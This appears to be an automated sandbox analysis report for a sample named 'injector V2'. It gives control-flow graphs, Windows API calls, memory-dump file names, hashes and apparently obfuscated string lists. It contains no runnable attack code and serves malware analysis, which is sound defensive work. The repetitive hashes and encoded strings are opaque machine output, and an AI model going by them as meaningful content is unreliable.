                                                                                                                            control_flow_graph 95 b4d4ca-b4d4f2 call b4d6cf 98 b4d6b7-b4d6b8 call b4d740 95->98 99 b4d4f8-b4d4fe 95->99 102 b4d6bd-b4d6bf 98->102 101 b4d501-b4d507 99->101 103 b4d603-b4d622 call b4a520 101->103 104 b4d50d-b4d519 101->104 106 b4d6c0-b4d6ce call b48dd1 102->106 112 b4d625-b4d62a 103->112 104->101 107 b4d51b-b4d521 104->107 110 b4d527-b4d533 IsValidCodePage 107->110 111 b4d5fb-b4d5fe 107->111 110->111 114 b4d539-b4d540 110->114 111->106 115 b4d667-b4d671 112->115 116 b4d62c-b4d631 112->116 117 b4d562-b4d56f GetCPInfo 114->117 118 b4d542-b4d54e 114->118 115->112 123 b4d673-b4d69d call b4da1b 115->123 121 b4d664 116->121 122 b4d633-b4d63b 116->122 119 b4d571-b4d590 call b4a520 117->119 120 b4d5ef-b4d5f5 117->120 124 b4d552-b4d55d 118->124 119->124 135 b4d592-b4d599 119->135 120->98 120->111 121->115 126 b4d65c-b4d662 122->126 127 b4d63d-b4d640 122->127 137 b4d69e-b4d6ad 123->137 129 b4d6af-b4d6b0 call b4da59 124->129 126->116 126->121 132 b4d642-b4d648 127->132 134 b4d6b5 129->134 132->126 136 b4d64a-b4d65a 132->136 134->102 138 b4d5c5-b4d5c8 135->138 139 b4d59b-b4d5a0 135->139 136->126 136->132 137->129 137->137 141 b4d5cd-b4d5d4 138->141 139->138 140 b4d5a2-b4d5aa 139->140 142 b4d5ac-b4d5b3 140->142 143 b4d5bd-b4d5c3 140->143 141->141 144 b4d5d6-b4d5ea call b4da1b 141->144 145 b4d5b4-b4d5bb 142->145 143->138 143->139 144->124 145->143 145->145
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00B4D6CF: GetOEMCP.KERNEL32(00000000,?,?,788496A7,?), ref: 00B4D6FA
                                                                                                                            • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00B4D8DA,?,00000000,?,788496A7,?), ref: 00B4D52B
                                                                                                                            • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00B4D8DA,?,00000000,?,788496A7,?), ref: 00B4D567
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CodeInfoPageValid
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 546120528-0
                                                                                                                            • Opcode ID: 4bc2093dba82f7c467ceb8236277272aa796ec41020f63852f32eae185aa96ba
                                                                                                                            • Instruction ID: f58ce3a83534f1be53be4940bb6bf28c01797575e83e4f8f98a6c27177aa8404
                                                                                                                            • Opcode Fuzzy Hash: 4bc2093dba82f7c467ceb8236277272aa796ec41020f63852f32eae185aa96ba
                                                                                                                            • Instruction Fuzzy Hash: 24513570A003459EDB21CF75C880BABBBF5EF65304F1945EED08A8B251EB749B46EB40

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 148 b4d2b2-b4d2b7 149 b4d2b9-b4d2d1 148->149 150 b4d2d3-b4d2d7 149->150 151 b4d2df-b4d2e8 149->151 150->151 152 b4d2d9-b4d2dd 150->152 153 b4d2fa 151->153 154 b4d2ea-b4d2ed 151->154 155 b4d354-b4d358 152->155 158 b4d2fc-b4d309 GetStdHandle 153->158 156 b4d2f6-b4d2f8 154->156 157 b4d2ef-b4d2f4 154->157 155->149 159 b4d35e-b4d361 155->159 156->158 157->158 160 b4d336-b4d348 158->160 161 b4d30b-b4d30d 158->161 160->155 162 b4d34a-b4d34d 160->162 161->160 163 b4d30f-b4d318 GetFileType 161->163 162->155 163->160 164 b4d31a-b4d323 163->164 165 b4d325-b4d329 164->165 166 b4d32b-b4d32e 164->166 165->155 166->155 167 b4d330-b4d334 166->167 167->155
                                                                                                                            APIs
                                                                                                                            • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,00B4D1A1,00B5CB48,0000000C), ref: 00B4D2FE
                                                                                                                            • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,00B4D1A1,00B5CB48,0000000C), ref: 00B4D310
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileHandleType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3000768030-0
                                                                                                                            • Opcode ID: 348975e5278339b0afb802a4f0d703527534fb4c52e9012de2bab40c34984b12
                                                                                                                            • Instruction ID: c2fe17e8a1e9ebccf0b8380b5a075c61446fb4b49722ae389d363cfa1e729848
                                                                                                                            • Opcode Fuzzy Hash: 348975e5278339b0afb802a4f0d703527534fb4c52e9012de2bab40c34984b12
                                                                                                                            • Instruction Fuzzy Hash: 1611BE715047514ACB348E3E8CD8622BAD5EB56331B380BDED0B6875F1C770DA8AF646

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 168 b2a0b0-b2a0ee 169 b2a0f0-b2a10b 168->169 170 b2a116-b2a11c 168->170 171 b2a10e-b2a114 169->171 172 b2a11e-b2a124 170->172 173 b2a14c-b2a16c ExitProcess 170->173 171->169 171->170 172->171 174 b2a126-b2a146 ExitProcess 172->174
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 621844428-0
                                                                                                                            • Opcode ID: 3baeb97debc81cc788f9da60d455fd2c511d23deed4f9ef9d96aad1951c7d043
                                                                                                                            • Instruction ID: a015e8ef9b35ebceecddd01bffcb65f3caf2a5d29ab992890bdd4d97bc4b901a
                                                                                                                            • Opcode Fuzzy Hash: 3baeb97debc81cc788f9da60d455fd2c511d23deed4f9ef9d96aad1951c7d043
                                                                                                                            • Instruction Fuzzy Hash: 8E110D35B102146BE7544A388970B6F7BEBDBCE721F1540E9E949E73C4DE314C468791

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 177 b4c7cc-b4c7db call b4ca1e 180 b4c804-b4c81e call b4c829 LCMapStringW 177->180 181 b4c7dd-b4c802 LCMapStringEx 177->181 185 b4c824-b4c826 180->185 181->185
                                                                                                                            APIs
                                                                                                                            • LCMapStringEx.KERNELBASE(?,00B50F78,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00B4C800
                                                                                                                            • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00B50F78,?,?,-00000008,?,00000000), ref: 00B4C81E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: String
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2568140703-0
                                                                                                                            • Opcode ID: 1424453df14d096d47e3a42b3bd708086e3f1a05e4272a32ca7e2b8e85086147
                                                                                                                            • Instruction ID: 51f8adf1e4b87242fc4b9f0fe13096a84cb104d6cd0ec8de5078fb9a514c46ee
                                                                                                                            • Opcode Fuzzy Hash: 1424453df14d096d47e3a42b3bd708086e3f1a05e4272a32ca7e2b8e85086147
                                                                                                                            • Instruction Fuzzy Hash: 6AF07A3200121ABBCF125F90DC09EEE7FA6EF487A0F094060FA1826020DB36C931BB91

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 186 b4dc4b-b4dc54 187 b4dc56-b4dc69 RtlFreeHeap 186->187 188 b4dc83-b4dc84 186->188 187->188 189 b4dc6b-b4dc82 GetLastError call b4e465 call b4e41c 187->189 189->188
                                                                                                                            APIs
                                                                                                                            • RtlFreeHeap.NTDLL(00000000,00000000,?,00B4BC8C,00B2782F), ref: 00B4DC61
                                                                                                                            • GetLastError.KERNEL32(?,?,00B4BC8C,00B2782F), ref: 00B4DC6C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 485612231-0
                                                                                                                            • Opcode ID: 968a351e61565c2030ad16061e0fb54d2c090737216ae0a41775b5e79da6a138
                                                                                                                            • Instruction ID: 189e6bed1e21980e7c59eb530d51daf056726a73d63c4995567e4e18d6aecb51
                                                                                                                            • Opcode Fuzzy Hash: 968a351e61565c2030ad16061e0fb54d2c090737216ae0a41775b5e79da6a138
                                                                                                                            • Instruction Fuzzy Hash: 26E04632200704ABCF122FA4FD09B997BA9EB40752F1040E0F61897161CB759A40D684

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 194 b4da59-b4da7b 195 b4da81-b4da93 GetCPInfo 194->195 196 b4db8d-b4dbb3 194->196 195->196 197 b4da99-b4daa0 195->197 198 b4dbb8-b4dbbd 196->198 199 b4daa2-b4daac 197->199 200 b4dbc7-b4dbcd 198->200 201 b4dbbf-b4dbc5 198->201 199->199 202 b4daae-b4dac1 199->202 204 b4dbcf-b4dbd2 200->204 205 b4dbd9 200->205 203 b4dbd5-b4dbd7 201->203 207 b4dae2-b4dae4 202->207 206 b4dbdb-b4dbed 203->206 204->203 205->206 206->198 208 b4dbef-b4dbfd call b48dd1 206->208 209 b4dae6-b4db1d call b4ec43 call b50e3f 207->209 210 b4dac3-b4daca 207->210 220 b4db22-b4db50 call b50e3f 209->220 212 b4dad9-b4dadb 210->212 215 b4dacc-b4dace 212->215 216 b4dadd-b4dae0 212->216 215->216 218 b4dad0-b4dad8 215->218 216->207 218->212 223 b4db52-b4db5d 220->223 224 b4db5f-b4db69 223->224 225 b4db6b-b4db6e 223->225 226 b4db7e-b4db89 224->226 227 b4db70-b4db7a 225->227 228 b4db7c 225->228 226->223 229 b4db8b 226->229 227->226 228->226 229->208
                                                                                                                            APIs
                                                                                                                            • GetCPInfo.KERNEL32(00000083,?,00000005,00B4D8DA,?), ref: 00B4DA8B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Info
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1807457897-0
                                                                                                                            • Opcode ID: 1d70e99ef17e7b6acbd3e48334776772f5fe46d4a16b16910d1484e4f81c882a
                                                                                                                            • Instruction ID: 10991c991ed4056e34409d23dab0f8d1acfd3436559c108a9ae922d237ec4204
                                                                                                                            • Opcode Fuzzy Hash: 1d70e99ef17e7b6acbd3e48334776772f5fe46d4a16b16910d1484e4f81c882a
                                                                                                                            • Instruction Fuzzy Hash: 185128B1908159AFDB118F28CDC4BE9BBE9EB16304F2401E9E599C7142D3359F85EB60

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 230 b2b0e4-b2b133 ReadFile 231 b2b139-b2b13e 230->231 232 b2cbcf-b2cbda 230->232 231->232 233 b2a1f0-b2a1f6 232->233 234 b2cbe0-b2cc2d 232->234 236 b2b7f0-b2b84a 233->236 237 b2a1fc-b2a252 233->237 234->236 238 b2cc33 234->238 236->233 254 b2b850-b2b87a 236->254 237->233 253 b2a254-b2a25f 237->253 238->237 253->236 255 b2a265 253->255 254->232 256 b2b880-b2b885 254->256 255->237 256->232
                                                                                                                            APIs
                                                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00B2B0FC
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2738559852-0
                                                                                                                            • Opcode ID: efb4cf24b17c03612b24d98395a0995f02a40541dbcfed7021397d12f966a26e
                                                                                                                            • Instruction ID: 7185865113b351fa2fe8be82bdd5e34ac5f6ae5b4e13f8fe9c31b6e934f39f01
                                                                                                                            • Opcode Fuzzy Hash: efb4cf24b17c03612b24d98395a0995f02a40541dbcfed7021397d12f966a26e
                                                                                                                            • Instruction Fuzzy Hash: 7311E5316083629FCE2C9A2878A553D67D3BBE6311F3845DEE40F877A4D9628D859603

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 257 b4eb9b-b4eba7 258 b4ebd9-b4ebe4 call b4e41c 257->258 259 b4eba9-b4ebab 257->259 267 b4ebe6-b4ebe8 258->267 260 b4ebc4-b4ebd5 RtlAllocateHeap 259->260 261 b4ebad-b4ebae 259->261 263 b4ebd7 260->263 264 b4ebb0-b4ebb7 call b4bc3e 260->264 261->260 263->267 264->258 269 b4ebb9-b4ebc2 call b4abd8 264->269 269->258 269->260
                                                                                                                            APIs
                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00B276E8,?,?,00B276E8,01E84800), ref: 00B4EBCD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocateHeap
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1279760036-0
                                                                                                                            • Opcode ID: 6364d5e1bc504ea384b2755560211144781a4d2e1a04fc0f90a94604b212e11f
                                                                                                                            • Instruction ID: 4ae4776048349417da8c99ab35688fe90d84389156f40f1b0892cb13b7374e71
                                                                                                                            • Opcode Fuzzy Hash: 6364d5e1bc504ea384b2755560211144781a4d2e1a04fc0f90a94604b212e11f
                                                                                                                            • Instruction Fuzzy Hash: C3E0ED31108226AADB2127659C85F6A7AC8FB427B0F1405E0FC23934C0CF60DF00B2E2
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: KH%Y$KJn?$KJn?$KJn?$KJn?$LH%Y$LH%Y$LH%Y$LH%Y$h^'$i^'$i^'$i^'$i^'$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%$zL%${L%${L%${L%${L%$V?D$V?D$V?D$V?D$V?D
                                                                                                                            • API String ID: 0-3543999248
                                                                                                                            • Opcode ID: d11b94d8e1e7a0a0393fd39350534f6a4378a8fa3d8254e457c94f5e795b6003
                                                                                                                            • Instruction ID: 8bdea4494a394f3e1a0a3e3fd6f17a2f7ca2b29a6aa1a485e4262d229aeab537
                                                                                                                            • Opcode Fuzzy Hash: d11b94d8e1e7a0a0393fd39350534f6a4378a8fa3d8254e457c94f5e795b6003
                                                                                                                            • Instruction Fuzzy Hash: 83B2B17A2597006F4B38CA2895C8669B3D29FD8370B35DB86D426CF3F8DB359C468642
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ($($($sL$sL$2h`?$2h`?$2h`?$2h`?$Dt$Dt$Dt$Hyol$Hyol$Hyol$Hyol$J+z7$J+z7$W8|$X8|$X8|$Yrf1$Yrf1$Yrf1$fM@#$fM@#$fM@#$zN_$zN_$zN_$No$No$[u$[u$[u
                                                                                                                            • API String ID: 0-1459843020
                                                                                                                            • Opcode ID: 92a2c0ae541ae7a76d76d4ed9fd146e66925cdedd2c3dc7040bb913e0b9abe22
                                                                                                                            • Instruction ID: ec0496337afd8055a36ec6650dbb6f14a9081dcd28c16d60811853cc85b636ee
                                                                                                                            • Opcode Fuzzy Hash: 92a2c0ae541ae7a76d76d4ed9fd146e66925cdedd2c3dc7040bb913e0b9abe22
                                                                                                                            • Instruction Fuzzy Hash: E4E2C33B7097118B4A288A2CE9D466DB2D396D4325F7B86D3D9138B3F8DB748C858743
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: >g[$!]j$"]j$"]j$"]j$"]j$&qq!$&qq!$&qq!$&qq!$&$&$&$&$+I"w$,I"w$,I"w$,I"w$,I"w$fVp$fVp$/YS$/YS$/YS
                                                                                                                            • API String ID: 0-635301867
                                                                                                                            • Opcode ID: be2c373e983d898951ee65cf91a86cbb334b35deeecb617bebe2a6090589d081
                                                                                                                            • Instruction ID: 0ff9528411ddc48cbd57ec4e62b6b214c9dc22e6c9dd0d49b9e929359a4dd675
                                                                                                                            • Opcode Fuzzy Hash: be2c373e983d898951ee65cf91a86cbb334b35deeecb617bebe2a6090589d081
                                                                                                                            • Instruction Fuzzy Hash: 30D2FB7AA056004B4A2CCA2895E163D72D3DBD877077C8BDFD4334B7E4CA719F45AA06
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695477440.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695495049.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695512577.0000000000B63000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_b20000_injector V2.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $^t0$$^t0$$^t0$6Haz$6Haz$6Haz$=am#$>am#$>am#$>am#$kX]E$lX]E$lX]E$lX]E
                                                                                                                            • API String ID: 0-4155389939
                                                                                                                            • Opcode ID: 90166c8b574403ab5dbc3d77106dd02332e4b59f3c28ab764a19c7a4841d80b6
                                                                                                                            • Instruction ID: f28344041a9f68d5fa22498c5d9443de6ceb4c22d51c9c62a51cac5c4870f5ce
                                                                                                                            • Opcode Fuzzy Hash: 90166c8b574403ab5dbc3d77106dd02332e4b59f3c28ab764a19c7a4841d80b6
                                                                                                                            • Instruction Fuzzy Hash: EBD23A36E152158B8F2C9A2CD5E117EB3D1DB54320B3506EEED23AB3E0CB32DD469691
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1695394711.0000000000B21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1695320078.0000000000B20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695441209.0000000000B57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1695460196.0000000000B5D000.00000040.00000001.01000000.00000003.sdmpDownload File
